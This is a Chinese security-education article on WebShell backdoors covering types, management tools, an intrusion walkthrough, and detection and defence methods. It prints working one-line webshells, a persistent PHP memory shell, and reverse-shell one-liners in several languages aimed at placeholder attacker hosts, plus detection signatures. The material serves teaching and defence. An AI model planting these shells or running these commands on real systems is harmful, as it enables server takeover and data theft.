米桃安全漏洞讲堂系列第4期：WebShell木马专题

一、WebShell概述

WebShell是黑客经常使用的一种恶意脚本也称为木马后门。其目的是获得对服务器的执行操作权限，比如执行系统命令、窃取用户文件、访问数据库、删改web页面等，其危害不言而喻。 黑客利用常见的漏洞，如文件上传、SQL注入、远程文件包含，甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分，最终达到控制网站服务器的目的。
为了更好理解WebShell，需要先了解两个概念：

• 什么是“木马”？
  “木马”全称是“特洛伊木马（TrojanHorse）”，原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市的故事。
  在互联网中，“木马”指一些程序设计人员在其可从网络上下载的应用程序或文件中，包含了可以控制用户的计算机系统的程序，可能造成用户的系统被破坏甚至瘫痪。
• 什么是“后门”？
  一台计算机上有65535个端口，若把计算机看作是一间屋子，65535个端口可以看做是计算机为与外界连接所开的65535 扇门。每个门的背后均承载一个服务。有的门是主人特地打开迎接客人（提供服务），有的门是主人为了出去访问客人而开设（访问远程服务）。理论上，除主人主动打开外，剩下其它门均应关闭，但因各种原因，如软件服务协议需要等，很多门均被开启。于是就有好事者进入，主人的隐私被刺探，生活被打扰，甚至屋内的东西也被搞得一片狼迹。这扇悄然被开启的门——就是“后门”。

1.1 WebShell的特点

WebShell就是网络上的特罗伊木马，也可称为后门。黑客在对目标进行攻击时，会使用各类漏洞工具进行尝试，在攻击行为后半段，常常会使用WebShell木马对攻陷的主机进一步利用，以及后续的内网横向扩展。本文所指WebShell等同木马。
黑客之所以青睐WebShell工具，主要因为WebShell有如下三大优势：

• 功能丰富
  WebShell属于远程控制类木马。它可以做到访问目标机器文件、连接数据库、远程登录、上传下载、记录用户操作行为、账号提权、内网横向扩展等丰富功能。几乎涵盖后渗透中所有需要的功能。
• 隐蔽性强
  WebShell可以嵌套在正常网页中运行，不容易被查杀。它还可以穿越服务器防火墙，由于与被控制的服务器或远程主机交互的数据都是通过80、443端口传递，因此不会被防火墙拦截。在没有记录流量的情况下，WebShell使用post包发送，也不会被记录在系统日志中，只会在Web日志中记录一些数据提交的记录。
• 持久化
  WebShell脚本通常包含后门，黑客上传WebShell后，利用WebShell后门可实现远程访问并控制服务器，从而达到长期控制网站服务器的目的。此外，在上传完WebShell之后，黑客会选择自己修复漏洞，以确保没有其他人会利用该漏洞。通过这种方式，黑客就可以一种低调的姿态，避免与管理员进行任何交互，同时仍然获得相同的结果。

二、WebShell分类

从编程语言角度，常见的WebShell脚本类型包括asp、aspx、jsp、php。若从广义的木马角度，还可包括python、perl等脚本语言。
从木马文件大小的角度分类，可分为大马、小马、一句话木马、内存马。随着木马体积的增大，功能也相对更丰富。但其隐蔽性越弱，特征明显，容易被安全防护设备识别。具体总结如下。

2.1 大马

体积大、功能全，具有文件管理、数据库管理、账号权限管理的能力，如phpSpy、jspSpy等常见大马。

2.2 小马

体积小、容易被上传，一般只具备文件上传功能，通常被用于下载大马。缺点是功能单一、隐藏性差。

2.3 一句话木马

一句话木马相比大马有本质的区别，用一句简短的代码来承载payload，将动辄十几K或者更大的大马&小马变成了几个字节。一句话代码极为精炼，不像小马&大马一样将直接功能写在脚本文件中，因此几乎没有什么特征，很难被病毒引擎检测到。一句话木马的出现，将攻击门槛和攻击成本大幅拉低，这也是目前最常见的WebShell攻击手段。一句话木马需要配合蚁剑、菜刀、冰蝎等客户端使用，通过客户端发送功能函数到服务端，服务端将功能函数执行并将结果返回，从而实现服务器端的恶意操作。
经典一句话木马包括：

php经典一句话木马:
    <?php @eval($_POST['a']);?> 
asp经典一句话木马:
    <%eval request("a")%>
aspx经典一句话木马:
   <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> 
jsp经典一句话木马：
	<%Runtime.getRuntime().exec(request.getParameter("i"));%>
1
2
3
4
5
6
7
8

2.4 内存马

内存马是目前检测难度最高的WebShell，是一种无文件木马，在服务器端没有文件实体，而是通过Web中间件污染系统内存，实现恶意代码驻留，再通过远程工具连接即可利用中间件执行恶意操作，比一句话木马的检测难度更高，近年来备受攻击者追捧，但也有一定缺陷，比如Web中间件重启后就会被释放掉。
目前内存马主要分为：PHP内存马、Python内存马、Java内存马。

典型的内存马如PHP不死马。是通过内存马启动后删除文件本身之前，使代码在内存中执行死循环，使管理员无法删除内存马，达到权限维持的目的。

##PHP不死马
<?php
  set_time_limit(0);
  ignore_user_abort(1);
  unlink(__FILE__);
  while (1) {
    $content = ‘<?php @eval($_POST["123"]) ?>’;
    file_put_contents("11.php", $content);
    usleep(10000);
}
?>
1
2
3
4
5
6
7
8
9
10
11

三、WebShell木马危害及利用方式

3.1 从一句话木马到控制主机

下面以一个博彩网站为案例说明，如何用木马实现对目标主机的控制。

对网站进行扫描，发现robots.txt文件中存在管理后台访问路径。使用密码爆破功能，成功爆破出网站后台管理员账号密码为admin/passw0rd。

登录后台，发现在 界面风格>编辑模板/css文件>添加模板处将aspx一句话木马添加成html文件。

利用WebShell管理工具菜刀成功连接到我们写入的一句话木马。

利用一句话木马上传一个aspx大马至目标服务器，方便进一步操作。

查看发现目标服务器为一台数据库服务器。开放1433端口，为MS SQL Server，使用xp_cmdshell执行系统命令漏洞，对数据库新增管理员角色。

之后打开目标主机3389端口，即可对目标主机实现远程登录。从而完成对服务器的控制。

上述案例从网站后台弱密码入手，使用文件上传功能，上传一句话目标，成功连接服务器。进而对主机进行渗透，最终完成对主机的完全控制。最关键的节点为通过木马，将攻击者和服务器连接起来。
完整的渗透攻防还包括前期信息搜集、木马解析、内网穿透、提权、横向扩展、权限维持、防溯源等内容，非本文重点，此处不赘述。

3.2 WebShell管理工具

常规的大马、小马、一句话木马、内存马，在木马隐蔽性和木马的功能丰富程度之间往往无法兼顾。为此，逐步发展出对WebShell木马的管理工具，能按场景生成需要的木马文件，兼顾木马免杀和功能丰富。
常用的WebShell管理工具包括，中国菜刀（Chopper）、冰蝎（Behinder）、蚁剑（AntSword）、哥斯拉（Godzilla）。通过管理工具连接上WebShell后就可以随心所欲的操作受害者主机，包括不局限于执行系统命令、探测内网、读取敏感文件、反弹shell、添加用户、清理痕迹、横向移动等操作。

3.2.1 中国菜刀（Chopper）

中国菜刀是一款专业的网站管理软件，用途广泛，使用方便，小巧实用，成名较早。只要支持动态脚本的网站，都可以用中国菜刀来进行管理。缺点是已可被绝大部分杀毒软件精准识别。

3.2.2 冰蝎（Behinder）

“冰蝎”是一个基于Java开发的动态二进制加密通信流量的新型WebShell客户端，可跨平台使用。目前最新版本为v4.1，兼容性较之前的版本有较大提升。由于其基于流量加密的的特性，冰蝎逐渐成为了红队成员在攻防演练期间经常使用的工具。
冰蝎主要功能有：基本信息、命令执行、虚拟终端、文件管理、Socks代理、反弹shell、数据库管理、自定义代码等，功能非常强大。
冰蝎其最大特点就是对交互流量进行对称加密，且加密秘钥是由随机数函数动态生成，因此该客户端的流量几乎无法检测。

3.2.3 蚁剑（AntSword）

中国蚁剑是一款开源的跨平台网站管理工具，源码建立在中国菜刀工具上。主要功能包括WebShell管理、文件管理、终端管理、数据库管理等功能。

3.2.4 哥斯拉（Godzilla）

哥斯拉是一款继冰蝎之后又一款于Java开发的加密通信流量的新型Webshell客户端。内置了多种有效载荷、加密器，支持内置插件，是目前在护网中使用较多的一款工具。

3.2.5 渗透测试框架

除了上述专门针对WebShell的管理工具，还有一类平台，专注于安全攻防全流程的渗透测试平台，也可称为远控工具。常见远程管理控制工具包括MSF、CobaltStrike、Armitage等。

• Metasploit，开源软件
  Metasploit，简称MSF，是一款开源的渗透测试框架。默认集成在Kali系统中，用户也可自行安装。所有的 Metasploit 版本都可在 Unix（包括Linux和Mac OS X）和 Windows 上运行。Github地址：https://github.com/rapid7/metasploit-framework。
  其内含软件和其他产品的安全漏洞利用代码块，可以抽取各类系统的信息，或者在设备上开启远程控制。
  msf为总模块，其他均为分支模块：
  辅助模块 (Auxiliary，扫描器)，扫描主机系统，寻找可用漏洞；
  渗透攻击模块 (Exploits)，选择并配置一个漏洞利用模块；
  攻击载荷模块 (Payloads)，选择并配置一个攻击载荷模块；
  后渗透攻击模块 (Post)，用于内网渗透的各种操作；
  编码器模块 (Encoders)，选择编码技术，绕过杀软（或其他免杀方式）。
  

• Cobalt Strike，商业软件
  Cobalt Strike，常被业界称为CS神器。同样是一款出色的渗透测试框架，为商业软件。它分为客户端与服务端。服务端是一个，客户端可以有多个，可被团队进行分布式协团操作。
  Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成，包括站点克隆获取浏览器的相关信息等。
  Team Server为团队服务器及Beacon 控制器，用于存储搜集各种数据、管理日志等。团队中的所有成员可以使用自己的Client端登录到Team Server实现协调作战。Beacon 是CobaltStrike 的 payload，常用的通信方式有HTTP、HTTPS和DNS隧道，除了DNS隧道，其他通信方式的回联端口均可自行设定。
  
  

四、WebShell木马检测及防护

上面讲述了WebShell的攻，下面讲述WebShell的防。

4.1 WebShell检测技术

WebShell的检测方式当今主流使用如下四种方式。

1）基于文件静态特征检测

技术原理：对脚本文件本身的hash值、文本内容中所使用的关键词、高危函数、文件修改时间、文件权限、文件所有者以及和其它文件的关联性等多个维度的特征进行检测，要求首先建立一个恶意字符串特征库用于比对。常见高危函数：

数据传递
$_GET、$_POST、$_COOKIE、$_SERVER  
命令执行
exec、passthru、shell_exec、system、eval
文件操作与远程 URL
file、file_get_contents、fopen、curl、fsockopen
回调函数
call_user_func、call_user_func_array、array_maparry_filter
其他高危函数
phpinfo、preg_replace、create_function、unserialize
1
2
3
4
5
6
7
8
9
10

优点：可快速检测，快速定位，对已知WebShell查找准确率高。
缺点：容易误报，无法对加密或者经过特殊处理的WebShell文件进行检测。尤其是针对窃密型WebShell无法做到准确的检测。窃密型Webshel通常具有和正常的WEB脚本文件具有相似的特征。

2）基于流量动态特征检测

由于所要完成的功能不同，攻击者访问 WebShell 脚本所产生的流量和正常 Web 页面请求所产生的流量模式不同，基于通信流量的检测就是通过对流量进行分析发现不同寻常的流量。
基于流量的检测是基于文件检测的一个重要补充，在某些场景下获取文件并对其进行检测是困难的，并且如内存马为无文件马，无法通过文件的方式进行检测，这时基于流量的检测就成为最重要的检测方式。
技术原理：采用流量（网关）型检测方式，先对流量"可视化”，检测WebShell在访问过程中产生的payload网络流量。经过一定的payload积累和规则定制，再经过和其它检测过程相结合形成一套基于流量分析WebShell检测引擎，嵌入到现有的网关型设备或云上实现WebShell的深度分析。
优点：可实时检测并阻止，还原攻击场景，快速定位主机和入侵者。
缺点：模型建立复杂（研发成本），无法检测加密payload。流量镜像部署成本。

进行网络流量检测，基于 WebShell 木马自身的静态特征进行识别。一些经典WebShell管理工具，如菜刀、蚁剑、冰蝎、哥斯拉等，它们所提供的 WebShell 具有一些固定的静态特征（即代码特征），成为流量类安全系统（如NDR/态势感知/WAF等）可以依赖的检测信标。总结如下：

菜刀WebShell的动态特征：
请求体中传递的payload为base64编码，并且存在固定，QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7J

蚁剑WebShell动态特征：
每个请求体都存在@ini_set(“display_errors”, “0”);@set_time_limit(0)开头。并且存在base64等字符。
响应包的结果返回格式为  随机数 结果  随机数

冰蝎WebShell木马动态特征：
2.0版本中采用协商密钥机制。第一阶段请求中返回包状态码为200，返回内容必定是16位的密钥
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
3.0版本在使用命令执行功能时，请求包中content-length 为5740或5720（可能会根据Java版本而改变）
每一个请求头中存在Pragma: no-cache，Cache-Control: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

哥斯拉WebShell动态特征：
所有请求中Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
所有响应中Cache-Control: no-store, no-cache, must-revalidate,
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

流量检测不仅对已知WebShell进行检测，还能识别出未知的、伪装性强的WebShell或组件反弹shell行为。对WebShell的访问特征（IP/UA/Cookie)、payload特征、path特征、时间特征等进行关联分析，以时间为索引，还原攻击事件。
流量检测恶意行为的方式，使用广泛，在安全产品iast交互式应用程序安全测试、rasp运行时应用自我保护技术中，均有用到。

3）基于日志分析检测

日志分析的WebShell检测，即根据确定的攻击事件来回溯已发生的攻击事件，再根据这用事件特征来防范在未来某时段内遭受到的相同攻击。其检测方式是先找到异常日志，再找到攻击日志，整个过程分两步：WebShell提取 ＋ WebShell确认。
WebShell的提取依据以下特征：访问特征（主要特征）、path特征（辅助特征）、时间特征（辅助特征）、Payload特征（辅助特征）、行为特征 。
WebShell的确认要根据其网页特征（网页的内容/结构、视觉）来确认。提取确认WebShell的访问者特征（IP/UA/Cookie)，Payload特征，时间特征，关联搜索，将搜索结果按时间排序，还原事件。

通过日志发现WebShell攻击的检测方式，在安全运营中心soc中较为常用。如常见的反弹shell命令，使用规则实时检测主机命令，可及时发现反弹shell行为，进而锁定攻击目标，进行阻断。
常见的反弹shell命令包括：

0x01 bash版本
bash -i >& /dev/tcp/attackerip/1234 0>&1
0x02 nc 版本
nc -e /bin/sh attackerip 1234
0x03 Telnet 版本
mknod backpipe p && telnet attackerip 8080 0backpipe
0x04 Perl 版本
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
0x05 Python 版本
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
0x06 php 版本
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
0x07 java 版本
r = Runtime.getRuntime()p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])p.waitFor()
0x08 ruby 版本
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

4）基于统计学分析检测

基于统计学的WebShell分析主要是根据WebShell脚本与正常源码的差异性来识别。根据上面对WebShell的特征分析，可以从多个方面进行基于统计学的分析技术。
（1）文件的重合指数index of coincidence（缩写为IC），用来判断文件是否被加密的一种方法。
（2）信息熵，一个数学上的抽象概念，这里把信息熵理解成某种特定信息的出现概率（离散随机事件的出现概率）。一个系统越是有序，信息熵就越低；反之，一个系统越是混乱，信息熵就越高。信息熵也可以说是系统有序化程度的一个度量。
（3）文件中的最长单词，在通过base64等一些加密后的WebShell一般形成一整串字符串，为正常的源码一般都不会这样。
（4）文件的压缩比，压缩的实质，在于消除特定字符分布上的不均衡，通过将短码分配给高频字符，而长码对应低频字符实现长度上的优化。那么对于base64编码过的文件，消除了非ascii的字符，这样实际上base64编码过的文件的字符就会表现为更小的分布的不均衡，压缩比就会变大。
（5）特征值匹配，第一个是匹配特征函数和代码，第二个是指匹配特定WebShell中的特征值。
在具体实现上，典型的代表为NeoPI。项目地址：https://github.com/CiscoCXSecurity/NeoPI。NeoPi采用的统计学分析方法就是以上五种技术。
采用这种检测方法也存在明显的弱点，NeoPi的检测重心在于识别混淆代码，它常常在识别模糊代码或者混淆编排的木马方面表现良好。未经模糊处理的代码对于NeoPi的检测机制较为透明。如果代码整合于系统中的其它脚本之上，这种“正常”的文件极可能无法被NeoPi识别出来。

4.2 WebShell木马防御建议

对于WebShell木马的防御，主要思路是切断其攻击链路。发现文件上传点——上传文件并解析——出内网连接攻击端——提权——获取数据——横向扩展——权限维持——痕迹清理。是一个完整的攻击链路。
从企业防护角度，可从如下三方面入手。

线上运维侧（前端）：

• 操作系统、数据库、中间件等及时更新漏洞补丁，预防如xp_cmdshell等提权漏洞。
• 生产环境域名加入WAF防护。waf可防御绝大部分网络攻击行为，如命令注入、反弹shell等。
• 公网环境收敛风险资产。防止暴露不必要的服务，为黑客提供利用条件。
• 流量监控。使用ids、ips等安全工具，对网络流量进行监测。发现安全风险及时预警。
• 日志监控。对于访问日志、系统日志、操作日志等进行监测，并配置WebShell行为特征告警，如反弹shell、文件hash等特征。

研发侧（后端）：

• 文件上传防护。主要针对文件上传漏洞，要对文件上传功能做相应防护。详情可参考本系列第3期内容：米桃安全漏洞讲堂系列第3期：任意文件上传漏洞-CSDN博客。总结为：后端白名单检查文件扩展名、后端限制文件上传大小、文件名随机命名、隐藏上传文件目录、文件不可执行。
• 加强研发侧流量日志监控，如Error、Warn日志。
• 禁用危险的PHP函数，例如exec()、shell_exec()、passthru()、system()、show_source()、proc_open()、pcntl_exec()、eval()与assert()。
• 及时对研发组件的高危漏洞安装漏洞补丁。
• 不要相信用户输入的信息。

用户侧：

• 办公电脑安装安全软件，EDR、杀毒软件。
• 提升安全防护意识。不打开未知链接、文件。如钓鱼邮件。
• 安装程序从官方网站进行下载，并校验文件hash值。
• 关注系统异常情况，如资源使用率飙升、未知进程等。
• 常见的WebShell检测平台自查。如下。

D盾防火墙（病毒检测工具）
http://www.d99net.net

VirusTotal在线木马检测平台（集成多个国内外安全引擎）
https://www.virustotal.com/gui/home/upload

微步在线云沙箱病毒威胁检测平台
https://s.threatbook.cn

河马-内存马在线查杀平台
https://n.shellpub.com/

五、总结展望

本文主要介绍了WebShell木马的特点、攻击方式及检测防护方法。WebShell编码简单，使用方便，而且功能丰富，是黑客钟爱的一种利用方式。尤其在历年护网行动中，WebShell木马的成功植入，是攻击方红队的得分利器。
企业在预防WebShell攻击方面需注重安全意识培训、安全开发、线上安全监测、定期审计等。而未来的趋势将聚焦于整合人工智能、零信任模型和协同防御。实现对异常行为的实时检测与响应，进一步加强对WebShell等潜在威胁的阻击能力，帮助企业构筑更为强大的网络安全体系。

往期链接

米桃安全漏洞讲堂系列第3期：任意文件上传漏洞-CSDN博客
米桃安全漏洞讲堂系列第2期：XSS跨站脚本攻击漏洞-CSDN博客
米桃安全漏洞讲堂系列第1期：SQL注入漏洞-CSDN博客